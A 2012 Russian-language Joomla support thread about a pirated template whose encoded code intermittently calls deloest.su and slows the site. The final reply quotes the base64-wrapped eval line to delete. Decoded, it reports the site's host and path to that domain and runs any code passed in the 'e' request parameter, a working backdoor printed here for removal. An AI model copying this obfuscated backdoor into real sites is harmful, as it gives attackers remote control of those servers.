0 Пользователей и 1 Гость просматривают эту тему.
  • 8 Ответов
  • 4217 Просмотров
*

CR@B

  • Захожу иногда
  • 63
  • 0 / 0
Переодически сама по себе выскакивает ошибка в верху страницы:

Warning: file_get_contents(http://deloest.su/test.php?host=solutions.by&url=/home/solution/public_html/templates/jp_insurance/index.php(9) : eval()'d code) [function.file-get-contents]: failed to open stream: Connection timed out in /home/solution/public_html/templates/jp_insurance/index.php(9) : eval()'d code on line 1

И сама исчезает. В это время долго грузится сайт.
Версия Joomla! 2.5.6
Шаблон: Jp_insurance

И что это за сайт такой:
http://deloest.su/
« Последнее редактирование: 06.09.2012, 18:29:30 от CR@B »
*

CR@B

  • Захожу иногда
  • 63
  • 0 / 0
Re: Ошибка Warning: file_get_contents
« Ответ #1 : 06.09.2012, 10:23:29 »
Неужели ни у кого не возникало такой ситуации?
*

mohax

  • Давно я тут
  • 901
  • 66 / 3
Re: Ошибка Warning: file_get_contents
« Ответ #2 : 06.09.2012, 10:51:29 »
Варезный шаблон, не?
*

CR@B

  • Захожу иногда
  • 63
  • 0 / 0
Re: Ошибка Warning: file_get_contents
« Ответ #3 : 06.09.2012, 11:08:48 »
не помню точно от куда, но денег я за него не платил точно.

По коду шаблона нигде ссылки нет на данный сайт
« Последнее редактирование: 06.09.2012, 11:13:25 от CR@B »
*

mohax

  • Давно я тут
  • 901
  • 66 / 3
Re: Ошибка Warning: file_get_contents
« Ответ #4 : 06.09.2012, 12:34:02 »
Конечно нет. Он у Вас зашифрован. Покупайте шаблон и переустанавливайте.
*

CR@B

  • Захожу иногда
  • 63
  • 0 / 0
Re: Ошибка Warning: file_get_contents
« Ответ #5 : 06.09.2012, 14:23:50 »
и неужели нет никакой возможности выловить от куда идёт ссылка?
*

mohax

  • Давно я тут
  • 901
  • 66 / 3
Re: Ошибка Warning: file_get_contents
« Ответ #6 : 06.09.2012, 15:19:35 »
Есть всякий непонятный текст в файле шаблона или где-то рядом? ПОд спойлер засуньте. Но для избежания недоразумений предлагаю все таки купить шаблон. Варез на форуме запрещен и поддержка не оказывается.
*

CR@B

  • Захожу иногда
  • 63
  • 0 / 0
Re: Ошибка Warning: file_get_contents
« Ответ #7 : 06.09.2012, 16:23:16 »
mohax
Огромное спасибо за помощь. Действительно есть закодированный текст в шаблоне.
И получалось скорее всего как, когда сайт на который была ссылка работал, ошибки не было, а когда он был недоступен - соответственно у меня ругалось.

Что касается варёза, я действительно не знал, что этот шаблон платный. Работая постоянно с PHPBB просто если он платный, то он платный (недоступен для простого использования), а если бесплатный - то валяется где хош. С данным шаблоном была такая же ситуация он есть доступен для стачивания на разных ресурсах (включая PSD исходники), поэтому даже мысли о его крэкнутости не возникло.
*

Kertis

  • Новичок
  • 5
  • 0 / 0
RE: Ошибка Warning: file_get_contents
« Ответ #8 : 14.12.2012, 23:57:08 »
в шаблоне, в файле index.php надо удалить вот эту строку
eval(base64_decode("ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly9kZWxvZXN0LnN1L3Rlc3QucGhwP2hvc3Q9Ii4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIiZ1cmw9Ii5fX0ZJTEVfXy4iIik7IGlmIChpc3NldCgkX1JFUVVFU1RbJ2UnXSkpIGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnZSddKSk7"));
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

[Решено] title материалов и категорий без пунктов меню

Автор pharaoh

Ответов: 265
Просмотров: 52212
Последний ответ 22.08.2021, 16:34:12
от Gerostrat
Ошибка загрузки скрипта

Автор shane

Ответов: 0
Просмотров: 757
Последний ответ 17.09.2019, 01:35:43
от shane
Ошибка 500 вместо 404 на несуществующих страницах с расширением только php

Автор old_lotar

Ответов: 12
Просмотров: 1010
Последний ответ 12.02.2019, 12:58:13
от draff
Ошибка в слове на главной странице. Как исправить?

Автор nqui

Ответов: 3
Просмотров: 2460
Последний ответ 29.03.2018, 05:15:41
от TkGhoul
Ошибка "error". нужен специалист! гарантирую оплату!

Автор mimoza

Ответов: 6
Просмотров: 1028
Последний ответ 25.02.2018, 14:47:40
от mimoza